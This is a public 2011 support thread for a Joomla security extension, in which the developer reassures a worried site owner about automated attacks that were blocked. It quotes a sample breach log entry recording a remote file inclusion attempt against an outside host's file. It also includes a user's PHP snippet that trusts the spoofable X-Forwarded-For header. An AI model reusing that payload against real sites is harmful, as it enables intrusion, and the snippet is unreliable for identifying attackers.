Support

Admin Tools

#9983 Very Frequent attacks on my website. Please guide.

Posted in ‘Admin Tools for Joomla! 4 & 5’
This is a public ticket

Everybody will be able to see its contents. Do not include usernames, passwords or any other sensitive information.

Environment Information

Joomla! version
n/a
PHP version
n/a
Admin Tools version
n/a

Latest post by nicholas on Tuesday, 02 August 2011 16:25 CDT

Friday, 29 July 2011 15:27 CDT

user40848
Mandatory information about my setup:

Have I read the related troubleshooter articles above before posting (which pages?)? Yes
Have I searched the forum before posting? Many times
Have I read the documentation before posting (which pages?)? Yes
Joomla! version: 1.5.23
PHP version: Latest
MySQL version: Latest
Host: Hostgator
Admin Tools version: svn364


Description of my issue:

I am very very very sorry for disturbing you again and again by asking foolish questions.

My last 2 hours security log is like this (of Autoblocking):

Reason: Bad Behaviour (Request contained a malicious JavaScript or SQL injection attack)
Reason: Bad Behaviour (User-Agent was found on blacklist)
Reason: Spammer (via HTTP:BL)
Reason: Bad Behaviour (User-Agent was found on blacklist)
Reason: Bad Behaviour (Prohibited header 'Range' present)
Reason: Bad Behaviour (Prohibited header 'Proxy-Connection' present)
Reason: Bad Behaviour (Referer did not point to a form on this site)
Reason: Bad Behaviour (Prohibited header 'Proxy-Connection' present)
etc.


I did bad behavior of honeypot to 10 and its age to 5. and everything as advanced as I can.

I have taken backup of whole website.

Emergency Offline will be too much costly for me.

1. What next I should do??
2. What more I can do??
3. How that hacker is taking and advancing??
4. Is there is some example guide available on internet which he is applying? Can I view that? Can you give some guide?
5. Is there is any way to find his actual IP address? Is there is anything by which we can block his actual IP rather then keep on blocking every time just blocking a proxy server?
6. Is this is common and happens with many websites including yours? and I should not give attention to such activities? What is your experience?

Friday, 29 July 2011 15:48 CDT

nicholas
Hi!

This kind of attacks is very common. they are usually set off by automated scripts which try standard attacks, in hope that they can infiltrate your site. By the time you receive the alarm email, they have been blocked. Using the automated IP blocking you are hampering the bots even more, as repeated attempts to infiltrate your site will be blocked and delayed, causing the hacking script to ultimately give up after a while.

There is nothing to worry about and pretty much nothing you can do. What you can do and already did is to install a security filter which completely blocks this kind of attack probes. Just relax and sleep a little better at night, knowing that these common attacks can not work against your site.

And, yes, I am receiving several dozens of them every single day on each of my own sites, along with a ton of other well-known hacking techniques launched against Joomla! sites. That is what prompted me to develop Admin Tools in the first place :)

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Friday, 29 July 2011 16:18 CDT

user40848
Thankyou so much for your reply.

Now I can sleep. Do you know this is 2:36 AM at India? Also, more importantly, I am a M.S. student and my exams are from tomorrow. I cannot even study due to all these.

I was in a big tension due to these hacking attempts.

Main problem are notification emails ;-) I am going to turn them off so that I can sleep well and score well in my exams.

Again thanks a lot for always giving immediate and useful reply. Your reply always makes my life more comfortable.

Friday, 29 July 2011 16:29 CDT

nicholas
Yes, it's a good idea to either turn off notification emails or filter them out of your inbox (both work equally fine; I have disabled them on my site, as I'm keeping an eye on the log anyways).

Good luck with your exams!

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Friday, 29 July 2011 17:20 CDT

user40848
Thanks, I turned them off. Now I will also keep my eye on Logs.

I would like to suggest you two things:

1. There should be a full and detailed log of hack attempt.
eg. Actual IP address should be logged, rather than proxy address (IF POSSIBLE to LOG that time and allowed by proxy)
if($HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"] != ""){
$IP = HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"];
$proxy = $HTTP_SERVER_VARS["REMOTE_ADDR"];
$host = gethostbyaddr($HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"]);

2. It should not only like "Reason: Bad Behaviour (Request contained a malicious JavaScript or SQL injection attack)", it should log each and every information. What was exact query etc.
or
"Reason: Bad Behaviour (User-Agent was found on blacklist)" rather it should log what was the exact attempt and by which agent

etc.

3. Similar to "Emergency Offline Mode" there should be also a mode in which to block all proxy access to website. This will be useful in case of acute emergency, and most often, hackers will not hack without proxy access. eg

RewriteEngine on
RewriteCond %{HTTP:VIA} !^$ [OR]
RewriteCond %{HTTP:FORWARDED} !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$
RewriteRule ^(.*)$ - [F]


Points 1 and 2 will also help in detailed and formal complaint to ISP and IC3.

Sorry to give you codes, these are just to express my view and codes I found from Google search. I know you are very expert in writing such great codes.

I am sorry if these are just foolish suggestions actually I am just a newbie. These might look like childish talks.

Friday, 29 July 2011 17:30 CDT

nicholas
1 & 2. Look inside your site's logs folder; you'll be pleasantly surprised (how do you think I debug Admin Tools blocking issues?) ;)

3. This will also block users behind Tor (there are legitimate uses for it), people on mobile browsers, transparent ISP proxies (usually marketed as "speed increase proxies"), corporate visitors and home users who are using a transparent Squid caching proxy to speed up frequent access to sites across browsers. I probably forgot a lot more valid proxy uses. Anyway, blocking proxies is an Awfully Bad Idea(tm), hence won't be included in Admin Tools.

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Friday, 29 July 2011 17:42 CDT

user40848
But Sir problem is that sever cpanel raw log did not given me information that i required. It also dont try to record actual IP address.

3. It can be just like an add on I thought. Just like emergeny offline. I know it will block many many users who are good but there can be some condition when you directly log hackers ip after blocking all proxies. He will try to access site directly we can catch him.

Saturday, 30 July 2011 01:41 CDT

nicholas
Did you look inside your site's log directory? Do you see a admintools_breaches.log file? Did you open it? Don't reply hastily, before you try what I suggest. I have understood what you said and that's why I told you to look in that directory. Sample entry:
-------------------------------------------------------------------------------
Blocking reason: rfishield
-------------------------------------------------------------------------------
Date/time : 2011-07-30 03:28:16 GMT
URL       : http://www.akeebabackup.com//index.php?strona=http://voip-pilot.com/1/jc.jpg??
User      : Guest
IP        : 96.30.22.108
Country   : US
Continent : 
UA        : Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)
Hash      : get
Variables :
Array
(
    strona => http://voip-pilot.com/1/jc.jpg??
)

That's a script kiddie trying to perform a remote file inclusion attack. With Bad Behaviour it gets more informative. As I told you, I use this log to debug the firewall. See how detailed the log is?

Regarding #3, as I said it would block too many desirable connections. Experience taught me a few things. If you put an option, people will click on it to see what happens. People never read the documentation. People never read 32pt red bold letters before clicking a button; they will just click the button. When their site breaks, people don't read the documentation, the troubleshooting wizard or search the forum. People will just come at the forum, either asking for support or shouting how idiot I am (until they are pointed to the documentation). And, finally, people always suggest that if a feature is dangerous, can break a site and not recommended to be turned on it should not be included in the software to begin with. And since I don't want to waste my time replying to endless posts why such a feature does more harm than good, there is not a cat's chance in hell of adding it in the .htaccess Maker ;)

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Saturday, 30 July 2011 01:47 CDT

user40848
Ohh I am sorry I was unaware admintools_beaches file. Sorry again.

Saturday, 30 July 2011 01:47 CDT

nicholas
You're welcome!

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Tuesday, 02 August 2011 16:11 CDT

Randy Prue
Here we give things a snowball's chance in hell.

I guess you don't get much snow in the Mediterranean.

Tuesday, 02 August 2011 16:25 CDT

nicholas
LoL! Snow? Oh you mean that white thingy... Yeah, we get some snow, about 10 days every second or third year :D

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Support Information

Working hours: We are open Monday to Friday, 9am to 7pm Cyprus timezone (EET / EEST). Support is provided by the same developers writing the software, all of which live in Europe. You can still file tickets outside of our working hours, but we cannot respond to them until we're back at the office.

Support policy: We would like to kindly inform you that when using our support you have already agreed to the Support Policy which is part of our Terms of Service. Thank you for your understanding and for helping us help you!